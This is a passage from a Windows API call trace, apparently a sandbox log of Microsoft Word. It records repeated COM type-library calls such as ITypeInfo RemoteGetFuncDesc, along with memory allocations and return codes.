lpMultiByteStr=0x204ef0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0045.270] ITypeLib:LocalReleaseTLibAttr (This=0x3dd7b80) returned 0x0 [0045.270] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x412) returned 0x3e6d550 [0045.270] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x81d8660 [0045.270] IUnknown:AddRef (This=0x7f72450) returned 0x4 [0045.270] IUnknown:Release (This=0x3dd7b80) returned 0xb [0045.270] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72450) returned 0x0 [0045.270] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72450) returned 0x0 [0045.270] IUnknown:Release (This=0x7f722f0) returned 0x1 [0045.270] IMalloc:Alloc (This=0x7feff045380, cb=0x14) returned 0x817bc30 [0045.270] IUnknown:Release (This=0x7f722f0) returned 0x1 [0045.270] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x412) returned 0x3e6d9a0 [0045.271] IMalloc:Free (This=0x7feff045380, pv=0x817bc30) [0045.271] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x206918 | out: ppvObject=0x206918*=0x7f722f0) returned 0x0 [0045.271] ITypeInfo2:GetCustData (in: This=0x7f722f0, GUID=0x7fee403d970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x206928 | out: pVarVal=0x206928*(varType=0x0, wReserved1=0x20, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0045.271] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.271] ITypeInfo:RemoteGetDocumentation (in: This=0x7f722f0, memid=-1, refPtrFlags=0x206920, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x206940 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x206940*="") returned 0x0 [0045.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x206830, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0045.271] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0045.271] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x206920, pDummy=0x0 | out: ppTypeAttr=0x206920, pDummy=0x0) returned 0x0 [0045.271] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.271] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x0, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.271] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.271] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.271] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.271] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.271] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.271] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.271] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.271] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.271] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.271] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.271] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.271] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.271] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.271] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.271] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.271] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.272] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.272] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.272] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.272] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.272] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.272] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.272] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.272] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.272] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.272] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.272] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.272] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.272] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.272] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.272] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.272] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x10, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.272] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.272] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x11, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.272] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.272] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x12, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.272] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.272] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x13, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.272] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.272] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x14, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.272] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.272] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x15, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.272] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.272] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x16, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.272] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.272] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x17, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.272] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.272] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x18, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.272] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.272] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x19, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.272] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.272] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1a, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.272] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.272] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1b, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.273] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.273] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1c, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.273] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.273] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1d, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.273] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.273] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1e, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.273] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.273] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1f, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.273] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.273] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x20, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.273] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.273] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x21, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.273] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.273] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x22, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.273] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.273] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x23, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.273] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.273] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x24, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.273] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.273] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x25, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.273] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.273] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x26, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.273] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.273] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x27, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.273] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.273] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x28, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.273] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.273] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x29, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.273] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.273] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2a, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.273] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.273] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2b, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.273] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.273] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2c, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.273] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.273] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2d, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.273] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2e, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.274] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2f, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.274] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x30, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.274] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x31, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.274] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x32, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.274] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x33, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.274] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x34, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.274] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x35, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.274] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x36, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.274] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x37, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.274] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x38, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.274] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x39, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.274] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3a, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.274] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3b, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.274] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3c, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.274] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3d, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.274] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3e, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.274] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3f, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.274] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x40, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.274] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x41, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.274] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.274] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x42, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x43, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x44, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x45, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x46, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x47, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x48, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x49, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4a, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4b, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4c, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4d, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4e, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4f, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x50, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x51, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x52, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x53, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x54, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x55, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x56, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.275] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.275] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x57, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.276] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.276] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x58, 